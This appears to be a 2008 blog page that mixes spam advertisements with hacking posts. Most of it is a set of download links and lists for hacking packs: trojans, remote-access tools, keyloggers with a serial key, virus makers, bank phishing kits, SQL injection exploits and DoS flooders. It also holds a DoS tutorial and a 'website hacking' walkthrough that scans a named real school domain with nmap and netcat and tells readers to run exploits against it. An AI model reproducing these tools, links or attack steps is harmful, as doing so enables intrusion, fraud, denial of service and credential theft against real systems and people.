From many years ago that all people can watch football sport from television. Football is sport that very interesting for all people in the world. Television broadcast football match from many league from many country. Now there is new option for you to watching clips of the football match through Internet named Web-TV. Recently Carlsberg Brewery launched a football web-TV-channel about football and fan life: Partofthegame.tv. This Web-TV as new TV concept for passionate football fans sets the direction for the future of television to engage passionate club fans across the world. If you interest with Carlsberg web-tv please click : www.partofthegame.tv.
Carlsberg Launches Web TV for Football Fans
Posted at Wednesday, December 10, 2008Hacker's Tool Set (45 Hacking Tools)
Posted at Monday, December 08, 2008Hacker's Tool Set (45 Hacking Tools)
try them idk i just found these
IMC Grahams Trojan
• IMC Ice Dragon
• Myspace Password Cracker
• IMC Myspace Phisher
• Ultra Surf
• Rapid Share Account Gen
• MSN Nudge Madness
• Ice Reloaded MSN Freezer
• IMC Handbook
• BrutusAE2
• Lord PS
• Hoax Toolbox
• IMC Word List
• Blues Port Scanner
• Bandook RAT v1.35
• Project Satan 2.0
• EES binder v1.0
• File Injector v3
• Remote Desktop Spy v4.0
• Passive Terror v1.3 Final Edition
• Dyn-DL (Dynamic downloader)
• Silent Assassin v2.0
• Net Scan Tools v4.2
• Rocket v1.0
• NStealth HTTP Security Scanner v5.8
• Attack Toolkit v4.1 & source code included
• Legion NetBios Scanner v2.1
• Battle Pong
• TeraBIT Virus Maker v2.8
• p0kes WormGen 2.0
• JPS Virus Maker
• IRC Ban Protection
• IRC Mega Flooder
• FTP Brute Hacker
• RAR Password Cracker
• Vbulletin 3.6.5 Sql Injection Exploit
• IPB 2-2.1.5 Sql Injection Exploit
• IPB 2-2.1.7 Exploit
• Cain & Abel v4.9.3
• NetStumbler 0.4.0
• Cryptor 1.2
• VNC Crack
• Hamachi 0.9.9.9
• pbnj-1.0
• Mutilate File Wiper 2.92
http://rapidshare.com/files/34738681/IMC...t.zip.html
AIO_Wireless_Hack_Toolz
Code:
http://www.mediafire.com/?azm5mmz5y3f (14.84 MB)
ALL IN ONE HACKER'S N33D 2006-Hackman
Code:
http://www.mediafire.com/?azyudyyeimy (58.63 MB)
UltraHacker 156 in 1
95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
f*ck Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfucker.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip
donlot:
http://www.sendspace.com/file/fk433s
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 150+ tools it is a great collection of useful tools for network users. The size of Net Tools 4.5.74 is approximately 25 Mb.
Contents
Net Tools 4.5 (build 74) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) Extra Tools (nmap console & win32 version)
http://rapidshare.com/files/50211300/Net....0.171.zip
Hack Tools
http://rapidshare.com/files/53227068/Htool.part1.rar
http://rapidshare.com/files/53230471/Htool.part2.rar
Rapidshare hackers
http://rapidshare.com/files/43093441/rha...wnload.rar
pass: mechodownload
MSN HACK
http://rapidshare.com/files/38797836/Msn...er.com.rar
PC HACKING
http://rapidshare.com/files/20414134/PC_...sameer.rar
Password Hacking AIO
http://rapidshare.com/files/15144318/Pas...ng_AIO.rar
Sub7 For Experts
!!Download Ultimate Hcking Tool "Sub7 legends"!!!!
Not for beginners!!!!! use carefully!!! Tutorial provided inside zip
password: 123456
click to get
http://www.filefactory.com/file/8207bf
Yahoo Booter!!
YAHOO BOOTER
http://rapidshare.com/files/55825962/Col...ll.zip.htm
1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.
2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass"
3) Pretty much self explanitory...hit the "login button"
4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb
Yahoo Magic Pass
use this one really easy
mAgic Password |Sender
http://rapidshare.com/files/56051314/mps7.zip.html
working
http://www.imagehosting.com/show.php/1144544_1.jpg.html
http://www.imagehosting.com/show.php/1144549_2.jpg.html
http://www.imagehosting.com/show.php/1144553_3.jpg.
Perfect Keylogger
If u visited our website u'll hav located by urself....
Perfect Keylogger
javascript:void(0);
submit
http://rapidshare.com/files/57868957/i_bpk2003.exe.html
username:::::: syk071c
serial key::::::: TLAM-GYUQ-JYCI-SLUO
more more tools
DHC hacking Tools AIO
image
http://img174.imageshack.us/img174/3531/toolzoj6.jpg
Contents:
1. Ddoz Toolz
2. SQL Injection
3. CC [ Credit Card ]
4. IRC Attacking
5. Google Hacker
6. RapidShare Hack Code
download:
http://rapidshare.com/files/81139182/DHC...berbot.rar
Full Hack Pack 2008
Full hack pack for everything you need Rapidshare , Hack msn , Windows Hacks , Paypal, Ebay, E-mail, Servers, Passwords Pass, Remote shutdown , Ultra Dos, Bios pass remover, Etc...
download
http://rapidshare.com/files/102416994/Wa....part1.rar
http://rapidshare.com/files/102416995/Wa....part2.rar
http://rapidshare.com/files/102416996/Wa....part3.rar
http://rapidshare.com/files/102490404/Wa....part4.rar
http://rapidshare.com/files/102490403/Wa....part5.rar
http://rapidshare.com/files/102490402/Wa....part6.rar
Passw : SharkMan
net tools
image
http://megauploader.org/out.php/i1982_ntscreenshot2.JPG
The Creation
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.
Contents
Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Many extra features and utilities are included in this package!
http://mabsoft.com/NetTools5.0.70.zip
Yahoo tools AIO
included:
* Password Decrypter2k 1.0
* Yahoo Avatar Hack
* Yahoo Delete me
* Y!Message Archive Decoder
* Yahoo New Sounds
* Yahoo Rapid Make Mail
* Yahoo Webcam Acces
* Yahoo Magic Avatar
* Yahoo Monitor
* Yahoo Spy
* Yahoo Winamp
* AlphaTool v4.2
* DarkYahoo-Unlocker
* Deny a Dork
* KrazyZ Tools v1
* Super Y!
* Yahoo Link SORRY v1
* Yahoo World v1
* Yahoo Unbanner
* Yahoo PRO
* SpyNick v3
* Messenger Monitor
* Hot Tools 1.0
* Ydaze pc v2
* Shanes Account UnBanner
http://rapidshare.com/files/144228434/Yahtools.rar
enjoy lol!!!!!!!!!!!!!!
Buy Online Xylitol and Erythritol at EmeraldForestXylitol.com
Posted at Saturday, December 06, 2008There are two sweeteners that are considered to be relatively safe and healthy for your body: Xylitol and Erythritol. These are natural sugar alcohol and if you want to know why it's widely considered the better sweeteners to put into your body, just take a look at the information page on it available at www.emeraldforestxylitol.com/guide_xylitol.htm. Among other helpful information, that page lets you know that: "It is 70% as sweet as table sugar yet it is virtually non-caloric, does not affect blood sugar, does not cause tooth decay, and is absorbed by the body, therefore unlikely to cause gastric side effects unlike other sugar alcohols." So, it's got the good stuff that you want from your artificial sweetener without many of the bad side effects.
Erythritol is white crystalline powder that is oderless and has a clean sweet taste that is similar to sucrose. It is approximately 70% as sweet as sugar and flows easily due to its nonhygroscopic nature. This natural sweetener has been a part of the human diet for thousands of years due to its presence in fruits such as pears, melons, and grapes as well as other foods such as mushrooms, wine, cheese, and soy sauce. Since 1990, erythritol has been commercially produced and added to foods and beverages to provide sweetness as well as enhancing food taste and texture.
Xylitol is a naturally occurring sweetener primarily derived from plant sources and has many surprising benefits. Xylitol is not actually a sugar, it's a sugar alcohol. Other sugar alcohols include erythritol, maltitol and sorbitol. Unlike other sugars it has five, not six, carbon atoms. Classified as a low calorie (2.4 calories per gram), low carbohydrate natural sweetener, xylitol is considered beneficial for your teeth and completely safe for diabetics. It has no toxicity and has not been linked to any form of disease. If you want to buy xylitol and Erythritol it's available on EmeraldForestXylitol.com that offers purchase online. Emerald Forest produces natural products sweeten with xylitol, and erythritol, as well as bulk packaging of natural sweeteners. Emerald Forest committed to producing natural, healthy products that make use of sweeteners that are both diabetic safe, and low in calories.
DoS Tutorial
Posted at Sunday, November 09, 2008DoS Tutorial
Contents:
I………………………………………………….What is it?
II…………………………………………………How does it work?
III………………………………………………What will I need?
IV………………………………………………Common miss-understandings…
Section I:
What is it?
Well DoS (Denial of Service) is an attempt to make a computer resource unavailable to its intended users. Trust me wikkipedia said it. In other words it is an attempt to make a site or service un-available or non-existent. There are a lot of DoS attempts on this site. It is generally easy to block if it is just one IP for example. But recently there have been a large group of people from all over the world that and all the genuine traffic on a Saturday evening will slow the servers.
Section II:
How does it work?
It works by sending lots of connection requests to a website or service. Then this means the server is over loaded and starts running slow. Therefore the real traffic cannot connect. This is by far the easiest attack you can do on a site. And there are many tools available to DoS an IP.
Section III:
What will I need?
You will either need programming knowledge suitable to program your own DoS attack OR one of these.
http://www.megaupload.com/?d=NGO2W3LG
http://rapidshare.com/files/104926676/LOIC.exe Low Orbit Ion Cannon
http://rs84.rapidshare.com/files/40856215/DDOS.rar
Password: canvas
Includes:
• NetBotAtt14En
• Click v2.2
• Spoofed IRC Nuker v1.3
• Hartz4Flooder v0.2
• Bitslap
• Crazyping v1.1
• Killme v1.0
• Bd0rk's DoS killer
• Krate port bomber
• Fed up v2.0
• Gimp
• Muerte v2.1
• Kaput v1.0 & beta v1.5
• Donut http flooder v1.4
• Blood lust
• Hospitables nuker v2.2
• Bitchslap v1.0
• Razors DoS tool v1.1
• Try2DdoS
• Firewall killer v1.3
• Death n destruction
• Assault v1.0
• NetBot Attacker v1.4 English
• Panteher v2.0
• Battle Pong
• Nemesy v1.3
• Meliksah nuke v2.5
• Inferno Nuker
• Rocket v1.0
• Igmp nuke v1.0
Section IV:
Common miss-understandings…
1) 32 bytes of data will not take down a website!
2) One computer is unlikely to have much effect on a server.
3) This does not work on Google
4) Or FBI main site
A Faster Start to Become A Hacker
Posted at Sunday, November 09, 2008A Faster Start to Become A Hacker
If you are serous about hacking and dont
know were to start then i think this is for you...
Its called Backtrack 3 final
Download backtrack3final.iso you will need a high speed internet connection to download this file
Watch this Video tutorial and make your self a backtrack3final.iso boot able disk
Now that you have your boot able Iso disk you need to put the disk into your cd drive and restart your computer. If you are with me so far then you will see this boot menu
You will need to pick the correct boot option... what boot option works on your computer this is up to you to figure out for your self... just simply press the up or down key and press enter... My labtop will only boot up with the (VESA KDE) option...
Now if backtrack boots up with no errors then you should see something like this
If at any time you see this screen then you need to enter these 3 commands
root
toor
startx
Website Hacking Tutorial
Posted at Sunday, November 09, 2008Website Hacking Tutorial
*post a comment if you like it, or if there is something wrong.
First, you want to find out as much about it as you can. So, first, you want to port scan it with nmap (I think its the best port scanner)
-----------------------------------------------------------------------
nmap -PN -sS http://www.siteyouwanttohackgoeshere.xxx -p 1-1000 -r -A -D randomdecoyip
-----------------------------------------------------------------------
So, my example would be.
-----------------------------------------------------------------------
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -A -D 156.164.25.734
-----------------------------------------------------------------------
nmap - Needs to be there tongue.gif
-PN - stops the ping
-sS - Scans for ports
-p 1-1000 - The ports to scan
-r - Makes the scan scan the ports in order
-sV - Shows what is running on the ports
-O - What opperating system is running
-D - Decoy scan
So, then you should get something like this.
-----------------------------------------------------------------------
C:\Documents and Settings\Captian falcon\Desktop\Tools\Reconnaissance\nmap-4.68>
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -sV -O -D http://www.mchs.gsacrd.ab.ca
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-01 20:56 Mountain Daylight Tim
e
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 20:57 (0:00:17 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 20:57 (0:00:17 remaining)
Interesting ports on gsacrd.ab.ca (199.216.233.173):
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp closed smtp
80/tcp open http Apache httpd 1.3.41 ((Darwin) mod_ssl/2.8.31 OpenSSL/0.9.
7l PHP/4.4.8)
110/tcp closed pop3
443/tcp closed https
510/tcp closed fcp
548/tcp open afp Apple AFP (name: Document Server; protocol 3.2; Max OS X
10.4/10.5)
Device type: general purpose
Running: Apple Mac OS X 10.4.X
OS details: Apple Mac OS X 10.4.8 - 10.4.11 (Tiger) (Darwin 8.8.0 - 8.11.1)
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.844 seconds
------------------------------------------------------------------------
Sometimes, it will say that the site is down, if so, put the -P0 at the end (Its a 0 not a o)
So the example would be.
------------------------------------------------------------------------
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -sV -O -D http://www.mchs.gsacrd.ab.ca -P0
-----------------------------------------------------------------------
Alright, now, say that the site has a firewall, so that would mean, that your scan would say 0 open ports sad.gif
But, don't worry. It is still possable to get into the site.
So, next thing you need to do is download netcat
Then, type this
--------------------------------------------------------------------------------------------------------------------------------------
nc -vv http://www.mchs.gsacrd.ab.ca 80
--------------------------------------------------------------------------------------------------------------------------------------
Then, when something pops up, you may need to type
--------------------------------------------------------------------------------------------------------------------------------------
GET test
--------------------------------------------------------------------------------------------------------------------------------------
Then, you should get something like this.
--------------------------------------------------------------------------------------------------------------------------------------
C:\Documents and Settings\Captian falcon\Desktop\Tools\Backdoor Apps\NETCAT>nc -
vv http://www.mchs.gsacrd.ab.ca 80
DNS fwd/rev mismatch: docs.mchs.gsacrd.ab.ca != gsacrd.ab.ca
docs.mchs.gsacrd.ab.ca [199.216.233.173] 80 (http) open
GET test
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET test
Apache/1.3.41 Server at http://www.mchs.gsacrd.ab.ca Port 80
sent 9, rcvd 328: NOTSOCK
--------------------------------------------------------------------------------------------------------------------------------------
Finally, we have most of what we need.
Next, we telnet to all of the open ports (If you get any)
So, if I were to telnet to the open ports, I would get (Say im telneting to port 22.
---------------------------------------------Port22---------------------------------------------------------------------------------
SSH-2.0-OpenSSH_4.7
--------------------------------------------------------------------------------------------------------------------------------------
So, to search for the exploit, I would search SSH then (Ctrl+F) 2.0
I would do that for every port I could find open.
Then, look for some exploits for the server type.
To do that, you would search for the server type and version.
MY example would be.
--------------------------------------------------------------------------------------------------------------------------------------
Apache
--------------------------------------------------------------------------------------------------------------------------------------
Then, (ctrl+f) 1.3.41
Then, edit the exploit so that it works onto your site (The one you are hacking) then compile the exploit, run it.
And, if you get a good exploit, you will get into the root of the website, and be able to edit any part of the site you want.
The sky is the limit.
--------------------------------------------------------------------------------------------------------------------------------------
Video download link
http://rapidshare.com/files/134232854/Ho...e.wmv.html
--------------------------------------------------------------------------------------------------------------------------------------
Don't get caught now.
--------------------------------------------------------------------------------------------------------------------------------------
For Nmap
http://nmap.org/download.html
For Netcat
http://sourceforge.net/project/showfiles..._id=209191
For exploits
http://www.milw0rm.com
Easy Process, Fast Funding and Excellent Service Business Loan
